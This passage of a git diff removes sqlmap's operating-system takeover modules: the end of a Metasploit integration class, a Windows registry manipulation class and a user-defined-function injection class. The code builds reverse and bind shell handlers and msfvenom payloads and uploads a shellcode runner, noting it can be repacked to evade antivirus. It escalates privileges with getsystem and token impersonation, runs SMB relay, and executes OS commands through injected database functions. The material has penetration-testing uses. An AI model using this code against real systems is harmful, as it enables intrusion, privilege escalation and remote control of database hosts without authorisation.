"linux/x86/shell"), - 2: ("Meterpreter (beta)", "linux/x86/meterpreter"), - } - } - - self._msfConnectionsList = { - "windows": { - 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), - 2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"), - 3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"), - 4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"), - 5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), - }, - "linux": { - 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), - 2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), - } - } - - self._msfEncodersList = { - "windows": { - 1: ("No Encoder", "generic/none"), - 2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"), - 3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"), - 4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"), - 5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"), - 6: ("Single-byte XOR Countdown Encoder", "x86/countdown"), - 7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"), - 8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"), - 9: ("Non-Alpha Encoder", "x86/nonalpha"), - 10: ("Non-Upper Encoder", "x86/nonupper"), - 11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"), - 12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"), - 13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"), - } - } - - self._msfSMBPortsList = { - "windows": { - 1: ("139/TCP", "139"), - 2: ("445/TCP (default)", "445"), - } - } - - self._portData = { - "bind": "remote port number", - "reverse": "local port number", 
- } - - def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1): - if Backend.isOs(OS.WINDOWS): - opSys = "windows" - else: - opSys = "linux" - - message = "which %s do you want to use?" % msg - - if lst: - for num, data in lst[opSys].items(): - description = data[0] - - if num > maxValue: - maxValue = num - - if "(default)" in description: - default = num - - message += "\n[%d] %s" % (num, description) - else: - message += " [%d] " % default - - choice = readInput(message, default="%d" % default) - - if not choice: - if lst: - choice = getUnicode(default, UNICODE_ENCODING) - else: - return default - - elif not choice.isdigit(): - logger.warn("invalid value, only digits are allowed") - return self._skeletonSelection(msg, lst, maxValue, default) - - elif int(choice) > maxValue or int(choice) < 1: - logger.warn("invalid value, it must be a digit between 1 and %d" % maxValue) - return self._skeletonSelection(msg, lst, maxValue, default) - - choice = int(choice) - - if lst: - choice = lst[opSys][choice][1] - - return choice - - def _selectSMBPort(self): - return self._skeletonSelection("SMB port", self._msfSMBPortsList) - - def _selectEncoder(self, encode=True): - # This is always the case except for --os-bof where the user can - # choose which encoder to use. 
When called from --os-pwn the encoder - # is always x86/alpha_mixed - used for sys_bineval() and - # shellcodeexec - if isinstance(encode, basestring): - return encode - - elif encode: - return self._skeletonSelection("payload encoding", self._msfEncodersList) - - def _selectPayload(self): - if Backend.isOs(OS.WINDOWS) and conf.privEsc: - infoMsg = "forcing Metasploit payload to Meterpreter because " - infoMsg += "it is the only payload that can be used to " - infoMsg += "escalate privileges via 'incognito' extension, " - infoMsg += "'getsystem' command or post modules" - logger.info(infoMsg) - - _payloadStr = "windows/meterpreter" - else: - _payloadStr = self._skeletonSelection("payload", self._msfPayloadsList) - - if _payloadStr == "windows/vncinject": - choose = False - - if Backend.isDbms(DBMS.MYSQL): - debugMsg = "by default MySQL on Windows runs as SYSTEM " - debugMsg += "user, it is likely that the the VNC " - debugMsg += "injection will be successful" - logger.debug(debugMsg) - - elif Backend.isDbms(DBMS.PGSQL): - choose = True - - warnMsg = "by default PostgreSQL on Windows runs as " - warnMsg += "postgres user, it is unlikely that the VNC " - warnMsg += "injection will be successful" - logger.warn(warnMsg) - - elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): - choose = True - - warnMsg = "it is unlikely that the VNC injection will be " - warnMsg += "successful because usually Microsoft SQL Server " - warnMsg += "%s runs as Network Service " % Backend.getVersion() - warnMsg += "or the Administrator is not logged in" - logger.warn(warnMsg) - - if choose: - message = "what do you want to do?\n" - message += "[1] Give it a try anyway\n" - message += "[2] Fall back to Meterpreter payload (default)\n" - message += "[3] Fall back to Shell payload" - - while True: - choice = readInput(message, default="2") - - if not choice or choice == "2": - _payloadStr = "windows/meterpreter" - - break - - elif choice == "3": - _payloadStr = 
"windows/shell" - - break - - elif choice == "1": - if Backend.isDbms(DBMS.PGSQL): - logger.warn("beware that the VNC injection might not work") - - break - - elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): - break - - elif not choice.isdigit(): - logger.warn("invalid value, only digits are allowed") - - elif int(choice) < 1 or int(choice) > 2: - logger.warn("invalid value, it must be 1 or 2") - - if self.connectionStr.startswith("reverse_http") and _payloadStr != "windows/meterpreter": - warnMsg = "Reverse HTTP%s connection is only supported " % ("S" if self.connectionStr.endswith("s") else "") - warnMsg += "with the Meterpreter payload. Falling back to " - warnMsg += "reverse TCP" - logger.warn(warnMsg) - - self.connectionStr = "reverse_tcp" - - return _payloadStr - - def _selectPort(self): - for connType, connStr in self._portData.items(): - if self.connectionStr.startswith(connType): - return self._skeletonSelection(connStr, maxValue=65535, default=randomRange(1025, 65535)) - - def _selectRhost(self): - if self.connectionStr.startswith("bind"): - message = "what is the back-end DBMS address? [Enter for '%s' (detected)] " % self.remoteIP - address = readInput(message, default=self.remoteIP) - - if not address: - address = self.remoteIP - - return address - - elif self.connectionStr.startswith("reverse"): - return None - - else: - raise SqlmapDataException("unexpected connection type") - - def _selectLhost(self): - if self.connectionStr.startswith("reverse"): - message = "what is the local address? 
[Enter for '%s' (detected)] " % self.localIP - address = readInput(message, default=self.localIP) - - if not address: - address = self.localIP - - return address - - elif self.connectionStr.startswith("bind"): - return None - - else: - raise SqlmapDataException("unexpected connection type") - - def _selectConnection(self): - return self._skeletonSelection("connection type", self._msfConnectionsList) - - def _prepareIngredients(self, encode=True): - self.connectionStr = self._selectConnection() - self.lhostStr = self._selectLhost() - self.rhostStr = self._selectRhost() - self.portStr = self._selectPort() - self.payloadStr = self._selectPayload() - self.encoderStr = self._selectEncoder(encode) - self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr) - - def _forgeMsfCliCmd(self, exitfunc="process"): - if kb.oldMsf: - self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) - self._cliCmd += " EXITFUNC=%s" % exitfunc - self._cliCmd += " LPORT=%s" % self.portStr - - if self.connectionStr.startswith("bind"): - self._cliCmd += " RHOST=%s" % self.rhostStr - elif self.connectionStr.startswith("reverse"): - self._cliCmd += " LHOST=%s" % self.lhostStr - else: - raise SqlmapDataException("unexpected connection type") - - if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": - self._cliCmd += " DisableCourtesyShell=true" - - self._cliCmd += " E" - else: - self._cliCmd = "%s -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) - self._cliCmd += "; set EXITFUNC %s" % exitfunc - self._cliCmd += "; set LPORT %s" % self.portStr - - if self.connectionStr.startswith("bind"): - self._cliCmd += "; set RHOST %s" % self.rhostStr - elif self.connectionStr.startswith("reverse"): - self._cliCmd += "; set LHOST %s" % self.lhostStr - else: - raise SqlmapDataException("unexpected connection type") - - if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": - self._cliCmd += "; set 
DisableCourtesyShell true" - - self._cliCmd += "; exploit'" - - def _forgeMsfCliCmdForSmbrelay(self): - self._prepareIngredients(encode=False) - - if kb.oldMsf: - self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) - self._cliCmd += " EXITFUNC=thread" - self._cliCmd += " LPORT=%s" % self.portStr - self._cliCmd += " SRVHOST=%s" % self.lhostStr - self._cliCmd += " SRVPORT=%s" % self._selectSMBPort() - - if self.connectionStr.startswith("bind"): - self._cliCmd += " RHOST=%s" % self.rhostStr - elif self.connectionStr.startswith("reverse"): - self._cliCmd += " LHOST=%s" % self.lhostStr - else: - raise SqlmapDataException("unexpected connection type") - - self._cliCmd += " E" - else: - self._cliCmd = "%s -x 'use windows/smb/smb_relay; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) - self._cliCmd += "; set EXITFUNC thread" - self._cliCmd += "; set LPORT %s" % self.portStr - self._cliCmd += "; set SRVHOST %s" % self.lhostStr - self._cliCmd += "; set SRVPORT %s" % self._selectSMBPort() - - if self.connectionStr.startswith("bind"): - self._cliCmd += "; set RHOST %s" % self.rhostStr - elif self.connectionStr.startswith("reverse"): - self._cliCmd += "; set LHOST %s" % self.lhostStr - else: - raise SqlmapDataException("unexpected connection type") - - self._cliCmd += "; exploit'" - - def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None): - if kb.oldMsf: - self._payloadCmd = self._msfPayload - else: - self._payloadCmd = "%s -p" % self._msfVenom - - self._payloadCmd += " %s" % self.payloadConnStr - self._payloadCmd += " EXITFUNC=%s" % exitfunc - self._payloadCmd += " LPORT=%s" % self.portStr - - if self.connectionStr.startswith("reverse"): - self._payloadCmd += " LHOST=%s" % self.lhostStr - elif not self.connectionStr.startswith("bind"): - raise SqlmapDataException("unexpected connection type") - - if Backend.isOs(OS.LINUX) and conf.privEsc: - self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true" - - if 
kb.oldMsf: - if extra == "BufferRegister=EAX": - self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format) - - if extra is not None: - self._payloadCmd += " %s" % extra - else: - self._payloadCmd += " X > \"%s\"" % outFile - else: - if extra == "BufferRegister=EAX": - self._payloadCmd += " -a x86 -e %s -f %s > \"%s\"" % (self.encoderStr, format, outFile) - - if extra is not None: - self._payloadCmd += " %s" % extra - else: - self._payloadCmd += " -f exe > \"%s\"" % outFile - - def _runMsfCliSmbrelay(self): - self._forgeMsfCliCmdForSmbrelay() - - infoMsg = "running Metasploit Framework command line " - infoMsg += "interface locally, please wait.." - logger.info(infoMsg) - - logger.debug("executing local command: %s" % self._cliCmd) - self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) - - def _runMsfCli(self, exitfunc): - self._forgeMsfCliCmd(exitfunc) - - infoMsg = "running Metasploit Framework command line " - infoMsg += "interface locally, please wait.." - logger.info(infoMsg) - - logger.debug("executing local command: %s" % self._cliCmd) - self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) - - def _runMsfShellcodeRemote(self): - infoMsg = "running Metasploit Framework shellcode " - infoMsg += "remotely via UDF 'sys_bineval', please wait.." - logger.info(infoMsg) - - self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval") - - def _runMsfShellcodeRemoteViaSexec(self): - infoMsg = "running Metasploit Framework shellcode remotely " - infoMsg += "via shellcodeexec, please wait.." 
- logger.info(infoMsg) - - if not Backend.isOs(OS.WINDOWS): - self.execCmd("chmod +x %s" % self.shellcodeexecRemote, silent=True) - cmd = "%s %s &" % (self.shellcodeexecRemote, self.shellcodeString) - else: - cmd = "\"%s\" %s" % (self.shellcodeexecRemote, self.shellcodeString) - - self.execCmd(cmd, silent=True) - - def _loadMetExtensions(self, proc, metSess): - if not Backend.isOs(OS.WINDOWS): - return - - send_all(proc, "use espia\n") - send_all(proc, "use incognito\n") - # This extension is loaded by default since Metasploit > 3.7 - #send_all(proc, "use priv\n") - # This extension freezes the connection on 64-bit systems - #send_all(proc, "use sniffer\n") - send_all(proc, "sysinfo\n") - send_all(proc, "getuid\n") - - if conf.privEsc: - print - - infoMsg = "trying to escalate privileges using Meterpreter " - infoMsg += "'getsystem' command which tries different " - infoMsg += "techniques, including kitrap0d" - logger.info(infoMsg) - - send_all(proc, "getsystem\n") - - infoMsg = "displaying the list of Access Tokens availables. 
" - infoMsg += "Choose which user you want to impersonate by " - infoMsg += "using incognito's command 'impersonate_token' if " - infoMsg += "'getsystem' does not success to elevate privileges" - logger.info(infoMsg) - - send_all(proc, "list_tokens -u\n") - send_all(proc, "getuid\n") - - def _controlMsfCmd(self, proc, func): - initialized = False - start_time = time.time() - stdin_fd = sys.stdin.fileno() - - while True: - returncode = proc.poll() - - if returncode is None: - # Child hasn't exited yet - pass - else: - logger.debug("connection closed properly") - return returncode - - try: - if IS_WIN: - timeout = 3 - - inp = "" - _ = time.time() - - while True: - if msvcrt.kbhit(): - char = msvcrt.getche() - - if ord(char) == 13: # enter_key - break - elif ord(char) >= 32: # space_char - inp += char - - if len(inp) == 0 and (time.time() - _) > timeout: - break - - if len(inp) > 0: - try: - send_all(proc, inp) - except (EOFError, IOError): - # Probably the child has exited - pass - else: - ready_fds = select([stdin_fd], [], [], 1) - - if stdin_fd in ready_fds[0]: - try: - send_all(proc, blockingReadFromFD(stdin_fd)) - except (EOFError, IOError): - # Probably the child has exited - pass - - out = recv_some(proc, t=.1, e=0) - blockingWriteToFD(sys.stdout.fileno(), out) - - # For --os-pwn and --os-bof - pwnBofCond = self.connectionStr.startswith("reverse") - pwnBofCond &= "Starting the payload handler" in out - - # For --os-smbrelay - smbRelayCond = "Server started" in out - - if pwnBofCond or smbRelayCond: - func() - - timeout = time.time() - start_time > METASPLOIT_SESSION_TIMEOUT - - if not initialized: - match = re.search("Meterpreter session ([\d]+) opened", out) - - if match: - self._loadMetExtensions(proc, match.group(1)) - - if "shell" in self.payloadStr: - send_all(proc, "whoami\n" if Backend.isOs(OS.WINDOWS) else "uname -a ; id\n") - time.sleep(2) - - initialized = True - elif timeout: - proc.kill() - errMsg = "timeout occurred while attempting " - errMsg += 
"to open a remote session" - raise SqlmapGenericException(errMsg) - - if conf.liveTest and timeout: - if initialized: - send_all(proc, "exit\n") - time.sleep(2) - else: - proc.kill() - - except (EOFError, IOError): - return proc.returncode - - def createMsfShellcode(self, exitfunc, format, extra, encode): - infoMsg = "creating Metasploit Framework multi-stage shellcode " - logger.info(infoMsg) - - self._randStr = randomStr(lowercase=True) - self._shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self._randStr) - - Metasploit._initVars(self) - self._prepareIngredients(encode=encode) - self._forgeMsfPayloadCmd(exitfunc, format, self._shellcodeFilePath, extra) - - logger.debug("executing local command: %s" % self._payloadCmd) - process = execute(self._payloadCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) - - dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X")) - pollProcess(process) - payloadStderr = process.communicate()[1] - - match = re.search("(Total size:|Length:|succeeded with size) ([\d]+)", payloadStderr) - - if match: - payloadSize = int(match.group(2)) - - if extra == "BufferRegister=EAX": - payloadSize = payloadSize / 2 - - debugMsg = "the shellcode size is %d bytes" % payloadSize - logger.debug(debugMsg) - else: - errMsg = "failed to create the shellcode (%s)" % payloadStderr.replace("\n", " ").replace("\r", "") - raise SqlmapFilePathException(errMsg) - - self._shellcodeFP = open(self._shellcodeFilePath, "rb") - self.shellcodeString = self._shellcodeFP.read() - self._shellcodeFP.close() - - os.unlink(self._shellcodeFilePath) - - def uploadShellcodeexec(self, web=False): - self.shellcodeexecLocal = os.path.join(paths.SQLMAP_EXTRAS_PATH, "shellcodeexec") - - if Backend.isOs(OS.WINDOWS): - self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32") - content = decloak(self.shellcodeexecLocal) - if SHELLCODEEXEC_RANDOM_STRING_MARKER in content: - content = 
content.replace(SHELLCODEEXEC_RANDOM_STRING_MARKER, randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER))) - _ = cloak(data=content) - handle, self.shellcodeexecLocal = tempfile.mkstemp(suffix="%s.exe_" % "32") - os.close(handle) - with open(self.shellcodeexecLocal, "w+b") as f: - f.write(_) - else: - self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch()) - - __basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "") - - self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename) - self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote)) - - logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote) - - if web: - written = self.webUpload(self.shellcodeexecRemote, os.path.split(self.shellcodeexecRemote)[0], filepath=self.shellcodeexecLocal) - else: - written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True) - - if written is not True: - errMsg = "there has been a problem uploading shellcodeexec, it " - errMsg += "looks like the binary file has not been written " - errMsg += "on the database underlying file system or an AV has " - errMsg += "flagged it as malicious and removed it. 
In such a case " - errMsg += "it is recommended to recompile shellcodeexec with " - errMsg += "slight modification to the source code or pack it " - errMsg += "with an obfuscator software" - logger.error(errMsg) - - return False - else: - logger.info("shellcodeexec successfully uploaded") - return True - - def pwn(self, goUdf=False): - if goUdf: - exitfunc = "thread" - func = self._runMsfShellcodeRemote - else: - exitfunc = "process" - func = self._runMsfShellcodeRemoteViaSexec - - self._runMsfCli(exitfunc=exitfunc) - - if self.connectionStr.startswith("bind"): - func() - - debugMsg = "Metasploit Framework command line interface exited " - debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, func) - logger.debug(debugMsg) - - if not goUdf: - time.sleep(1) - self.delRemoteFile(self.shellcodeexecRemote) - - def smb(self): - Metasploit._initVars(self) - self._randFile = "tmpu%s.txt" % randomStr(lowercase=True) - - self._runMsfCliSmbrelay() - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - self.uncPath = "\\\\\\\\%s\\\\%s" % (self.lhostStr, self._randFile) - else: - self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self._randFile) - - debugMsg = "Metasploit Framework console exited with return " - debugMsg += "code %s" % self._controlMsfCmd(self._msfCliProc, self.uncPathRequest) - logger.debug(debugMsg) - - def bof(self): - self._runMsfCli(exitfunc="seh") - - if self.connectionStr.startswith("bind"): - self.spHeapOverflow() - - debugMsg = "Metasploit Framework command line interface exited " - debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, self.spHeapOverflow) - logger.debug(debugMsg) diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py deleted file mode 100644 index 904ca730..00000000 --- a/lib/takeover/registry.py +++ /dev/null @@ -1,117 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - 
-import os - -from lib.core.common import randomStr -from lib.core.data import conf -from lib.core.data import logger -from lib.core.enums import REGISTRY_OPERATION - -class Registry: - """ - This class defines methods to read and write Windows registry keys - """ - - def _initVars(self, regKey, regValue, regType=None, regData=None, parse=False): - self._regKey = regKey - self._regValue = regValue - self._regType = regType - self._regData = regData - - self._randStr = randomStr(lowercase=True) - self._batPathRemote = "%s/tmpr%s.bat" % (conf.tmpPath, self._randStr) - self._batPathLocal = os.path.join(conf.outputPath, "tmpr%s.bat" % self._randStr) - - if parse: - readParse = "FOR /F \"tokens=*\" %%A IN ('REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\"') DO SET value=%%A\r\nECHO %value%\r\n" - else: - readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\"" - - self._batRead = ( - "@ECHO OFF\r\n", - readParse, - ) - - self._batAdd = ( - "@ECHO OFF\r\n", - "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData), - ) - - self._batDel = ( - "@ECHO OFF\r\n", - "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue), - ) - - def _createLocalBatchFile(self): - self._batPathFp = open(self._batPathLocal, "w") - - if self._operation == REGISTRY_OPERATION.READ: - lines = self._batRead - elif self._operation == REGISTRY_OPERATION.ADD: - lines = self._batAdd - elif self._operation == REGISTRY_OPERATION.DELETE: - lines = self._batDel - - for line in lines: - self._batPathFp.write(line) - - self._batPathFp.close() - - def _createRemoteBatchFile(self): - logger.debug("creating batch file '%s'" % self._batPathRemote) - - self._createLocalBatchFile() - self.writeFile(self._batPathLocal, self._batPathRemote, "text", forceCheck=True) - - os.unlink(self._batPathLocal) - - def readRegKey(self, regKey, regValue, parse=False): - self._operation = REGISTRY_OPERATION.READ - - 
Registry._initVars(self, regKey, regValue, parse=parse) - self._createRemoteBatchFile() - - logger.debug("reading registry key '%s' value '%s'" % (regKey, regValue)) - - data = self.evalCmd(self._batPathRemote) - - if data and not parse: - pattern = ' ' - index = data.find(pattern) - if index != -1: - data = data[index + len(pattern):] - - self.delRemoteFile(self._batPathRemote) - - return data - - def addRegKey(self, regKey, regValue, regType, regData): - self._operation = REGISTRY_OPERATION.ADD - - Registry._initVars(self, regKey, regValue, regType, regData) - self._createRemoteBatchFile() - - debugMsg = "adding registry key value '%s' " % self._regValue - debugMsg += "to registry key '%s'" % self._regKey - logger.debug(debugMsg) - - self.execCmd(cmd=self._batPathRemote) - self.delRemoteFile(self._batPathRemote) - - def delRegKey(self, regKey, regValue): - self._operation = REGISTRY_OPERATION.DELETE - - Registry._initVars(self, regKey, regValue) - self._createRemoteBatchFile() - - debugMsg = "deleting registry key value '%s' " % self._regValue - debugMsg += "from registry key '%s'" % self._regKey - logger.debug(debugMsg) - - self.execCmd(cmd=self._batPathRemote) - self.delRemoteFile(self._batPathRemote) diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py deleted file mode 100644 index 13c0c9de..00000000 --- a/lib/takeover/udf.py +++ /dev/null @@ -1,411 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os - -from lib.core.agent import agent -from lib.core.common import checkFile -from lib.core.common import dataToStdout -from lib.core.common import Backend -from lib.core.common import isStackingAvailable -from lib.core.common import readInput -from lib.core.data import conf -from lib.core.data import logger -from lib.core.data import queries -from lib.core.enums import DBMS -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import 
EXPECTED -from lib.core.enums import OS -from lib.core.common import unArrayizeValue -from lib.core.exception import SqlmapFilePathException -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.core.exception import SqlmapUserQuitException -from lib.core.unescaper import unescaper -from lib.request import inject - -class UDF: - """ - This class defines methods to deal with User-Defined Functions for - plugins. - """ - - def __init__(self): - self.createdUdf = set() - self.udfs = {} - self.udfToCreate = set() - - def _askOverwriteUdf(self, udf): - message = "UDF '%s' already exists, do you " % udf - message += "want to overwrite it? [y/N] " - output = readInput(message, default="N") - - if output and output[0] in ("y", "Y"): - return True - else: - return False - - def _checkExistUdf(self, udf): - logger.info("checking if UDF '%s' already exist" % udf) - - query = agent.forgeCaseStatement(queries[Backend.getIdentifiedDbms()].check_udf.query % (udf, udf)) - return inject.getValue(query, resumeValue=False, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY) - - def udfCheckAndOverwrite(self, udf): - exists = self._checkExistUdf(udf) - overwrite = True - - if exists: - overwrite = self._askOverwriteUdf(udf) - - if overwrite: - self.udfToCreate.add(udf) - - def udfCreateSupportTbl(self, dataType): - debugMsg = "creating a support table for user-defined functions" - logger.debug(debugMsg) - - self.createSupportTbl(self.cmdTblName, self.tblField, dataType) - - def udfForgeCmd(self, cmd): - if not cmd.startswith("'"): - cmd = "'%s" % cmd - - if not cmd.endswith("'"): - cmd = "%s'" % cmd - - return cmd - - def udfExecCmd(self, cmd, silent=False, udfName=None): - if udfName is None: - udfName = "sys_exec" - - cmd = unescaper.escape(self.udfForgeCmd(cmd)) - - return inject.goStacked("SELECT %s(%s)" % (udfName, cmd), silent) - - def udfEvalCmd(self, cmd, first=None, last=None, 
udfName=None): - if udfName is None: - udfName = "sys_eval" - - if conf.direct: - output = self.udfExecCmd(cmd, udfName=udfName) - - if output and isinstance(output, (list, tuple)): - new_output = "" - - for line in output: - new_output += line.replace("\r", "\n") - - output = new_output - else: - cmd = unescaper.escape(self.udfForgeCmd(cmd)) - - inject.goStacked("INSERT INTO %s(%s) VALUES (%s(%s))" % (self.cmdTblName, self.tblField, udfName, cmd)) - output = unArrayizeValue(inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False)) - inject.goStacked("DELETE FROM %s" % self.cmdTblName) - - return output - - def udfCheckNeeded(self): - if (not conf.rFile or (conf.rFile and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs: - self.sysUdfs.pop("sys_fileread") - - if not conf.osPwn: - self.sysUdfs.pop("sys_bineval") - - if not conf.osCmd and not conf.osShell and not conf.regRead: - self.sysUdfs.pop("sys_eval") - - if not conf.osPwn and not conf.regAdd and not conf.regDel: - self.sysUdfs.pop("sys_exec") - - def udfSetRemotePath(self): - errMsg = "udfSetRemotePath() method must be defined within the plugin" - raise SqlmapUnsupportedFeatureException(errMsg) - - def udfSetLocalPaths(self): - errMsg = "udfSetLocalPaths() method must be defined within the plugin" - raise SqlmapUnsupportedFeatureException(errMsg) - - def udfCreateFromSharedLib(self, udf=None, inpRet=None): - errMsg = "udfCreateFromSharedLib() method must be defined within the plugin" - raise SqlmapUnsupportedFeatureException(errMsg) - - def udfInjectCore(self, udfDict): - written = False - - for udf in udfDict.keys(): - if udf in self.createdUdf: - continue - - self.udfCheckAndOverwrite(udf) - - if len(self.udfToCreate) > 0: - self.udfSetRemotePath() - checkFile(self.udfLocalFile) - written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", forceCheck=True) - - if written is not True: - 
errMsg = "there has been a problem uploading the shared library, " - errMsg += "it looks like the binary file has not been written " - errMsg += "on the database underlying file system" - logger.error(errMsg) - - message = "do you want to proceed anyway? Beware that the " - message += "operating system takeover will fail [y/N] " - choice = readInput(message, default="N") - - if choice and choice.lower() == "y": - written = True - else: - return False - else: - return True - - for udf, inpRet in udfDict.items(): - if udf in self.udfToCreate and udf not in self.createdUdf: - self.udfCreateFromSharedLib(udf, inpRet) - - if Backend.isDbms(DBMS.MYSQL): - supportTblType = "longtext" - elif Backend.isDbms(DBMS.PGSQL): - supportTblType = "text" - - self.udfCreateSupportTbl(supportTblType) - - return written - - def udfInjectSys(self): - self.udfSetLocalPaths() - self.udfCheckNeeded() - return self.udfInjectCore(self.sysUdfs) - - def udfInjectCustom(self): - if Backend.getIdentifiedDbms() not in (DBMS.MYSQL, DBMS.PGSQL): - errMsg = "UDF injection feature only works on MySQL and PostgreSQL" - logger.error(errMsg) - return - - if not isStackingAvailable() and not conf.direct: - errMsg = "UDF injection feature requires stacked queries SQL injection" - logger.error(errMsg) - return - - self.checkDbmsOs() - - if not self.isDba(): - warnMsg = "functionality requested probably does not work because " - warnMsg += "the curent session user is not a database administrator" - logger.warn(warnMsg) - - if not conf.shLib: - msg = "what is the local path of the shared library? 
" - - while True: - self.udfLocalFile = readInput(msg) - - if self.udfLocalFile: - break - else: - logger.warn("you need to specify the local path of the shared library") - else: - self.udfLocalFile = conf.shLib - - if not os.path.exists(self.udfLocalFile): - errMsg = "the specified shared library file does not exist" - raise SqlmapFilePathException(errMsg) - - if not self.udfLocalFile.endswith(".dll") and not self.udfLocalFile.endswith(".so"): - errMsg = "shared library file must end with '.dll' or '.so'" - raise SqlmapMissingMandatoryOptionException(errMsg) - - elif self.udfLocalFile.endswith(".so") and Backend.isOs(OS.WINDOWS): - errMsg = "you provided a shared object as shared library, but " - errMsg += "the database underlying operating system is Windows" - raise SqlmapMissingMandatoryOptionException(errMsg) - - elif self.udfLocalFile.endswith(".dll") and Backend.isOs(OS.LINUX): - errMsg = "you provided a dynamic-link library as shared library, " - errMsg += "but the database underlying operating system is Linux" - raise SqlmapMissingMandatoryOptionException(errMsg) - - self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(".")[0] - self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1] - - msg = "how many user-defined functions do you want to create " - msg += "from the shared library? " - - while True: - udfCount = readInput(msg, default=1) - - if isinstance(udfCount, basestring) and udfCount.isdigit(): - udfCount = int(udfCount) - - if udfCount <= 0: - logger.info("nothing to inject then") - return - else: - break - - elif isinstance(udfCount, int): - break - - else: - logger.warn("invalid value, only digits are allowed") - - for x in xrange(0, udfCount): - while True: - msg = "what is the name of the UDF number %d? 
